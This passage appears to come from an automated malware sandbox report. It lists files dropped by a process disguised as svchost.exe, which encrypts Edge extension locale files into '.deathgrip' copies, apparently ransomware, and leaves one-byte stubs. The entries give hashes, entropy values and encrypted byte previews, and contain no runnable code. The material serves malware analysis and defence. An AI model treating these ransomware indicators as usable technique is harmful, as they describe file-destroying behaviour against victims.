                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2128
                                                          Entropy (8bit):7.867961509221451
                                                          Encrypted:false
                                                          SSDEEP:48:oSvMNP7+IzLEVYhw3OPu91UTuZhekc8gp8C+uCcPOyFwj+:oSvMZUYi99XZNcPR1eS
                                                          MD5:046AA3EDC99D9980E9EBEE3B7982A9FE
                                                          SHA1:B39D6C4FBCCBDD35650EA52E503BA845B985D8CC
                                                          SHA-256:5B213852F0C30A9DC723F3CA66D1D92527DFBD0C77F1A2F613565D6B6EB90DB7
                                                          SHA-512:590DFD9ABBCCF657CBD6A6801DAC53E0CBAFCF76226E50575645CFB331CCB78DD0533A41AEDCE4FE73E042765C8A451E0C8DBFDB6D38CAFB1A559F6FF00D0DFB
                                                          Malicious:false
                                                          Preview:........_]<.)..^.-..u..a....NE..._.G.{...`...........n..}....fc.y.......N{.=..|`&..E58..wFp....O...2.fo+P..}"..b.d.....".p..4h@"0.;..JyD....E...k.s..Z.l...K.....jK.x..e7..^T....~...g?..1.....)......r...<.mK......m.p.G.7..-F..../.^.....x."......-.9\........)_r.....w.)...U....2...N[.K..0..v.gJ.Jx.3....w...."..}u..c..b5.....s..\.\.G.S...@.Q}(...F..U]DFv7..Y.+..iX..........[......i.....7OGZ..8-.A.b..x.j....n...l4.o.$...... ....yf....$F.CZ.\...6...J...[.....f...Z..rWD.GK................{N..R...Njf%!^aS..~...p.1....w...y.E..2R...S..+x.<W...D..+...g(....-A+.J..p.U...V^.h......RtX.. .E.^...w)...{.D.?..G.S.{..].Y_...x..d.d...aeA.*...C.~.y.?........[........"-.9...es..>?T.._..$....^`p...V.......|..[..(..wP..=.;...!...%.".\.........o!...,...T...s<..k.. n~..f.C....`..~...c.....!.s.Z..FA."...N..D .V[;...[cw+...$.2.4w......*>kR...T*...Ze.Ds..J.!.[.....K.....QO..a.........[..3..(o.......K.P.aqR...4S.h.)..h.......p..E/..eii....].{"e&M.z.g.cP.._~,%.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1296
                                                          Entropy (8bit):7.7181468472135775
                                                          Encrypted:false
                                                          SSDEEP:24:6Wf+K7AgchRSvaSl3dcGGCXMax37YZj54Zg+Wfus2KhAfS9kd6spe0On:j+oAgc74bGCXMax37YZj5bL28OS6/7O
                                                          MD5:916E94550214E68CD474800DCE824ACC
                                                          SHA1:F11044AF74D2CE5E95A99AF1DA5265A2EB6812EA
                                                          SHA-256:5198309CAFD32E25C3579946C314C5E6204104DFCD45538CC477C04B6A02CE5B
                                                          SHA-512:4496AA4EB278CD8893E18A441F8D59368473CEEA969C20633F51FC62D5FEC1ABF076F0BAF9D52983B336F12C4C7FFCDED726D101FC20DF7DFAD3BEEEC9B0B930
                                                          Malicious:false
                                                          Preview:........c.1..T44.n....>..4KX....GJ=g1}-.iI.~.y...?...xD..e....?..;.f.'....#y........!.s..>...........1u....d7..K....\.}..A......6.......%..v...0.>}B...H.n ...W.....SO..\."gIQa.M..NQM4n;ph...n.n...K.0.37..........p...n...f.....67...G..(..^<&..vF....,)n1..N...y.......s...h.b.@..m.............D.....r..VF.q.A.]`N.:...A..FRk.Mz"B..-..%....WB}.......lh..aX..h=.z.>T...7*TL.@)?.....Zz.$....Lr..=._?.&.A.2..T....?..d2.u.;.!...<>........."........T..=..y../4....<........_&1...X..}].h..Ro..8...T.O.C|t-...G....aJ...3m-+.h...F.N:......ms..W....L..%)......].M....CB.K.s....6.x[[.n..y.l.S..~.W.M,...{....K!......Z..o~g....T)f+5..x..x...T...R.E....v.5.&F2......p..cB..~.Q...jD....bf..[./..p......E.mU..G._.....a...4^[..?.s....d."..H.4....r.S..$?.w........I...&W....YH.....j./l.l..i{...!...%....F....2)....$N..b,[ .p.,...n.2..D5...Kz.gB........L.h...A>d'.F..)Cd...!_WD......q..1.L......./%....*P..&*.y...K.>.7.....fS92JsLe06bsV9VASIP8xLkrLBW3OStV8XbOQyQkwBeyihSg

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1280
                                                          Entropy (8bit):7.7272353359866495
                                                          Encrypted:false
                                                          SSDEEP:24:1N4mkwDWGASj0n0TzeFn2GehEy2HRlbpA9sb9Fechh6c265OimrMpD7s8+kB:bDk3sjsgqF2Gml2H3bNbB6awimg5kkB
                                                          MD5:1FD6BE5910ACFDAF07D6EB8CA2B47399
                                                          SHA1:B3709C4CB3228BCD762CC81A76AC0AA0D0F0A68A
                                                          SHA-256:CB6D4DCD22D2ED0AA7D45A9FF2B7DDF6F2C79A59EA429EBE6F78D65A5C672751
                                                          SHA-512:40E906F0EFBFE90DF9F506C451E72A96AB4EDEE37A069EF61BE9D42792F19DB06B2C859738F3044885CEDA690DF846B423CFA581F8066C0069ED2F483CE22107
                                                          Malicious:false
                                                          Preview:..........r..(+..5.K..D.B.]..F.....T....-....i....C.m...GO.;.%.]z...0. TR..P..!.d...,..:.*.%G...(.....>..z.....4.`.c..S.X.Mo.\...........r......|...|.W...i.H.*"8..+L..... P...#...*..mz.7....eO.kw1.b....0s.2'7C...@......p)..X../.... iSPG..R...8aj.T.M.T......Yx3..W......s{..p.^A(]`....9{......."..gr. _FH.et.....E...G.H..}dN^..D...........Xl0....$.q.".n........6E......e......db9....p.?.C.DI...5.......F..x...U.d.q.A....c...w.....&=[m?z..!..'G.'.....1z..m..$#4.ry..x..}.......)....P0..a...R2....'...)VTm.^T.,(Xo..<2d]..z.....RBf....(...D...Q.F(b/......6J.s|.ev..x.`"%...>b.j...q.$&t.....G-1....3.Q.r!.$.?@.O.F\.?G.z#.@..E|...du..I...yy~d5.....dz.O...M....m.6.........q_..wW&&..6....W..U.Y.im.it.$A.N..|.....3P....~.uq1...|.2..V..30..s.}.4!.r..)........_...N....(6..*....-e......+..#..M.._.....$.....lx...e|t.V.D...F.7n+SM\......:./(...4r......ZP......k.......y.......X.......DL......d..\Y.|...0...ja/+\p.h..KjyTctEfmlQcHskjnGz+tkRSD5hojydxl+ZkxGt916mSwEFHme+YaSNLRcbgC0V8

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1168
                                                          Entropy (8bit):7.691439936304355
                                                          Encrypted:false
                                                          SSDEEP:24:kI6ya4JUIEBea1gtpC1hXMion4RGDoCPoAwVIoOkvWMMkoq0Z:kb2Da2C1hhQvoqkvWMMF3Z
                                                          MD5:751AF0B92A2296C75B557F3F01B21D47
                                                          SHA1:3EA79F9CE2AAEFB60703A3EF5136A7343ADE4899
                                                          SHA-256:268269A2E4AC757B4237EACEF59BE59B4329D6CA5156FEDA76B6CA8819D57230
                                                          SHA-512:51B4FB27C1322C6F9D6712F1EFD9B4D8E99ACE51938FB9689F71EFB09E23192C3301EDB09247EFF9D73847A66E8C5E1D06A7FD0467EDF97A1C57D4B4FF00D327
                                                          Malicious:false
                                                          Preview:.........{&=......?"?..d..\.I.'&..(.....7.x....;...'q...J..M......3P..Y..G,.G......h].cRv.K..J...H.........d..8.}....M..p.F..@..m..X....&.H`...H.ND.....r...J.>.*...8Q.uS4.~.-....D=..,&..\f.j..../1..}......y..b.d.|,..+.... ;RA.}..Hgo5.9b@c....S...n.....O?....A.<...bve.R.am......i...p.......=.R&..|.o.}....t....a%......ZJ. @..<.7m....o..:.9.A......(..f1eH2}dx...;..g@1..O...L.]..S.e...#.O...kf.@oW..S.B..#..A..n._.f.....s......Un.R?.DPS...8.2.w/....[nv".N6......0.Q..B<f..fk.qj....8^...~.m....M$..%)Zh...*..........|.. cd.8..o.........T..U....I...8.Y.p...hJ....g...%.U .k...3.>+.&`/...1...K......;..8.v...~...t).qd.9..8y..=..a\.".........-.D..0S.....6.-..f..[.COf[..y..>.p_.8..|]...D..lc...-..Zu...V$B..D.=..{Y...x...d."....*..zF...!.R.R...B\..........G/....>..}&..Mn.4]N>..X.......<..n%..8...M.9...Q.BoJGbJSFlYGN2M+Xb+iYjNduxJ7rOVUktrVQx94KaWepyj1j+BAoovluw0YuPXKpXygvy1MFY5c/Kw9f/Q4z9bi7GxbiTGiwZxhzyhNau+/Eb6towMoJEPhGXwKgvasWg+TMT+YtpGdxLR0JTcW6TtBGUhZq+VrVTWyKpeugXN44xa1A

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1248
                                                          Entropy (8bit):7.670321401087609
                                                          Encrypted:false
                                                          SSDEEP:24:C9VYy/gH1oW6Q8/pasiHv6Cmf2AAPd025+lrnr+KHGmjgOQCDKcXqXPtP:qGro9CmfnAPd76nr+KVgEBXqXPZ
                                                          MD5:78FE0DE6061E5D37A610D52E198758A0
                                                          SHA1:944417778D2F2F7DD5A0A2124B0711A6C0BB8A65
                                                          SHA-256:4BD8F9F89BDFF3357979C23E6E25E1B019B23B0AFB4424F98C4D968815A157FB
                                                          SHA-512:4EA02DDC2A38EA1115ABD719C415BE99714FB735E84795F354AF95FFCEB020AF7B61505727BE9232FF3BAEA341D37CD83CA03D088330AE3F2BC648BFF1BD3D5F
                                                          Malicious:false
                                                          Preview:..........s..*bOGa?.a....,.~.^..Qx2...]c....S>.]..G...mq..~..E..S$..Q:..c.C.....,A/..+\v.#...9.B.r.~iL...z... .....F..|fTW.:.........~.........^.~6#.}q.......ht#.).hJ6.x..OHB<..'..S.!.3.U...x&.ga.&z|j...h........\..f..7N.5..z.Jo...D....#.n..X.6Dz....[.FZK.....{..YWr.J...,.U*....:...mp...Uo.\..a. .|%FxB3.8sg.r..........4.b8.u].q.t.K..r...(.<...q>...Y'.6(V.A..4E2......}&XBH..#.+(..oS..|..Udj.z...8.B.....{..9-......U..2.g.B....o8.......Z.u.....d.T .;,. ..K....A.Az..7.<........+ZD.4y,q..EH..R.'=n..,.6=....Nc.a..r.....b.....!...8..0bMy..._.&K_.`.<.d..I..I7........r|.C|f.4S...bC.?......7 bG.......%*. .....|w....j......zv....Jt.e.;..T....... ..PD....-.d.-..!KF...m...C...qY.*.uw......7......X..qBl...j..C.N.f....<...b.....=...&.+.v|.s'...E.U,7a(...a:..L.8]..(...L...i..0R.q.[.'#PeD..r\5M%..>j.."s4>.kE..v0E.....cO F..SD..7..Y.Q...s(.a$K....:.Jfqv..N].....4..e.fu-.Y.SjD1bnLo0WV1bfhBIDvnTRamlb51S7KrL9ApZBjvfmPKaYE0f2GoK9Sqk4qxKSELBmbd5Qq1pGt8mNcMNWtwluX1qnWY+FxK

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.7304841773986945
                                                          Encrypted:false
                                                          SSDEEP:24:SCISJpypSggESrI5iZg1/IGN6D843MQ1gGakRHCBggy+4sOMsnZF3RHrAmpRbs:SYXzHfIKyw843EG50Bty+MM23RLjpls
                                                          MD5:942EDC84F4E1E8F97E3147A81B799A6F
                                                          SHA1:765A9ABE26EA399ADCC56A3DDD95C0EFCA393427
                                                          SHA-256:D621D3BF7129F43CCEE82647915EED69562BB749565F6CD18577059ECAE27A27
                                                          SHA-512:22CFC356BD85887EB9EB96485E5DD343E6626EA5726B05E715AFD2C21C5942CA14419A65B569A40A9F6428BDE9155294274CDBD69FD79163DEF1DCBE6909654F
                                                          Malicious:false
                                                          Preview:.........J...F..=..^.[\.W...1......H..4!..'%f.f;wHo.WE....P.93.O.}..5..`-z.$p-...z..W.?j.T..i...U.Y....?w..y....H6...L..e.P=....g..c...s...^..l...V..V.E .T......OjbQW&..6....(.wRz..vZ....e...-....>.Q..w}..|..FL.{6I;....`"...o.E4..J....}^i...b....x...X&....jU./AM..}B......j5.qv..{j..e............P...7.'..A.u<.F/...=....=...A...cL{P...-rk....5.C$.j...Y..SU.!.k.6.i..6.9R..0.~8...3..7...KM...K.I.~.rW....#..............r.i...O...u..bd.R;.{vZ@.....9...=..+)....U....{.'z%.e.i.Z..n.m..tw*......e....>..\..x....N6......&........5q.N.;2...........v.......z....|.W........sP................F.aH......H.i6q>.../k....pN3.D...^...... DZ.Yq....3.z]8.+....uz`..9..3...~.f........U.>..86mV.h.........p.....7e.2D.).)."Z...<c.W...I.z....<8..u.K......s..f}T .a..b...jl.K...K..!c....mR..F..k...x.....cz*.#.........*.A..m2.TY......BtB:=Y........X....8.D..4.....KY..,...<.....W......M.Mp..2.v.f..q..8?a.....y.D^....q#..~65b..J.....UYX......(.@..<g./ .%.x=..]... ..+.....h"rn&.R

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1968
                                                          Entropy (8bit):7.825446767793512
                                                          Encrypted:false
                                                          SSDEEP:24:QDwHr2LbCAPa+uTeUnNcUe4pqPyvo8DV9Z6tJYjmCFHI15cxX+vxon8lO13uSjH/:Q8HOpPaE6AsV/CYjnc5ycxo15jgM7+I
                                                          MD5:08F396865BB71ABBC9D0FC2C85FF68BC
                                                          SHA1:DE7E143BC7241C33DFE77847D145219DEEF522FD
                                                          SHA-256:6C780F7417127C7DFEF22B15A7852FD5E4704B5D18B5CE11DBE31F9ED5F801FA
                                                          SHA-512:488A5C6A0A733031AC77B550D3D2DF99EB8752000CA37EA414F83D17F67C4160FA7D0CFD416152CD937884917D61878437EDC56C880A83A0D478A006437DCA75
                                                          Malicious:false
                                                          Preview:.........L...Ji..^..(...I.Jj..-..3...t.p.w8....L.v.g.Q\..P.G...v.e.....\H..,k:..~..].Yn.".).h..9i...-!.....A...~..&...W.yN....2E..;.-ukC.^...>.....)....gE.2iyQ.{....d.U....R..!.vAd .f.x.G..Y...n.w.f..a..lE....[[...D....n.4.zy...9...R.`$..fS.... w..E....A...4..U4.....&../^..1&...E#...W\.........H..^..JE......s.U.e....%$.g.U_..U+....#.q.O..#..$"`....A..*....1/....9X)..]=.0B].V...t.8..h9.I.M..Aw|..,.....y..a.e2.~"d...A.m..@..Ip..=#v...Q.FI.....................2T.*(.B...T..n...l. @.jk..Gr.'.0.c.R.L.. ._...R.f.D3.....`.nE.)...,..w...j.[gY.X<.\.6.nQ..Pvd.]F..0..0).;;$....<.cl..+*{....F..........g.k... ....DS.'.'\O]....2.+..\h!..M..SV..?V,.)..0;....7..2...D..1.W4.+(../..:....U..u?.5.:...qF.v..q.g..q.]...,...0Y)....U....N..2./."+...i>a.'....b{8y).F..TR..P].Z.X.wU@3* Yb.?..<..Q..]..<.]_eb....|.N1.P..w.#0$=Iq^x..r.z.7.;..4.4..r..n-...j..c..l7.....`r(.63.Rcx..t.l._....s.,...q.T..../...UC.b.nkh..,..W>d.#.6...}..N2Sx.!...n .,K........zY

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):7.7124434798594175
                                                          Encrypted:false
                                                          SSDEEP:24:qhlqcAmzXI+gyZmy2rcaZNWpjFsPQ6CZPWsKYPzA9YkY6C/Ud1eUM:3AIAZmbrcaUgfqOsnA9jYX8dQ9
                                                          MD5:6C110A5D6DECD0D42C050D7407577F4A
                                                          SHA1:FA98077933011006AA254AECB27BCB9256C0C787
                                                          SHA-256:CBAB4F61A940E5DCB2398E2B7F397E2D2E8E1AC650B7B1D546E7FAACFA78E83B
                                                          SHA-512:B1264A8CCACF886A673621ABC6A6C8C92C2B41F3AB32A4E285D361F795AF7A0D1AEF795CCE37D512D367FF5C88FC591183B97A89C424AF9E14FB928FB562B8D2
                                                          Malicious:false
                                                          Preview:.........C=..h...y..V.3.......#..^...85..j.....(.;.Mng.nK..fW....M..)......%cISw..Y...3W.D..b.C....g.%.?.J....m?.....f.(<4[..C1..bb...F..^.....!.Q.`..=....pI....=/.y/..'....&.......f,.....> ...H._....#...|...p.....?@r.......P...^. $...o...-.[.....$.).8.5..S#9<.p...e4'*....g.H..n....p.^a......RY.....GhY.R|~......t(+[\....(...y.~...O..4..X.($.o..6..".[.j82.6g[B}z'...#....ja.'.R.....a..Q..l.lR.........1.z..<....5.e.4..=5`..gd.&.Ds0...l1.Q......"?..1..z}.G.C.v.......$....J..........gWa.u..m....sbRxt.....Q.(*s\_..1.*.6.......d5*..M..P[...s@...3'ir.&..me.#R.....)..{..k 64E...1..'.l....).K..UA.'......e...c.#.+.......G.y...m/...Ah...@..s[.zp. ....... q.........r....W..a6.z....Yu.A.l.7..T@Q..;..+p.s4..wQ..?2.\.........T..Q....vRKD.k.M.....F........3......O.m...#..&A82..l..T......>{P..*.. ..J...+.FO...Y..>.6.9.g.;cc{.x4.. |..gP8RC/FKR9j+4/PWpZAIXw2vPALtnruf1VhzDyzxddZ8rdmOn9q1V8syKtaQa7oD5XVQAoPlA49GgKxxTUWlFb8rWBxCC1lNhSqN8x5noBH5kGzvR3QPF+IeAgBNek2F

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):7.724105591304052
                                                          Encrypted:false
                                                          SSDEEP:24:dkn56A1EgJAQABYsJbS46s3fK5mH6x4vW4xpKaqNja/5Le:daMOEgJAxBRlhP2Qjx8aqV4Je
                                                          MD5:CDC99CD13F3EF37C12BBED9AE0538490
                                                          SHA1:B60C5EEDADA905852357F696B1CBAE36CBE7535D
                                                          SHA-256:BBF84E4FE01132C5121ACA568399E35D2F999AAFD4A98BE3E29B83033B33418B
                                                          SHA-512:DE7FC435BF2104D0C58AE8CF1943DD00AFB05D69957DF9CED6432443AEF535812818425B58188E2244EE2CAC6702949E351761CC175FAB19164436D17AD2579B
                                                          Malicious:false
                                                          Preview:............U: ..O};c.U.-.G.$...bS.As.9....!F...v.....yG.....o....$.;)z.8..I....j..3..v...G.t/<.@Zou(....G....:....../Q..+.fh\....$.W.W.=.t.w...s...O...`.....*....S{..mZ...SF!...6...V)..`.B.....z.s..crU..L.<....n~.........p..z.Nl.)Z.3Z.dR..".?...e......i...7... .!..G.....i..H|,..k..:!..9.....Gj.Da..V./....Kn.S..i4l.....b.$....E.w...x...y..j.....k...GnMd}T3..^?.......%..'N..U@.+.F..,..7>..!........#.$.g%.V}@xU5c.y........ u.........\......<,.L....|.G..M>ZT...cG....C..Ss."(.8.v.&...j..I......j..#'......%....ML...)..;....+.0.JW......p..,.m.......0..t....t..E....zEJx`...Q.m..@5!_v\9i..].qD..[....5/..s.....s<.w......o.K...U.a..z...A.!..K.H9.&1...;9.*...y.j2.i.e...H....g=..q....q.J> "y...W.[...fr."$Ap..jl...v;.n.o^.2.QE...B.w...'h.n...S............F;..gj..9......2._..A...}x....LZ.".[...#..:..9.$..0...Y..}..........hv3S0bEmsfyHlODr1u4Jad/EFdX7PRx6H7p1cYodvelp/66GyNGTyQoISk+3b5F6Ez+jmu4uEIC/QV6IhUMwyeyup5EoH8V4bnjlGcl4kZ6gTjNZlsH7skMSI5tOEy34s

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
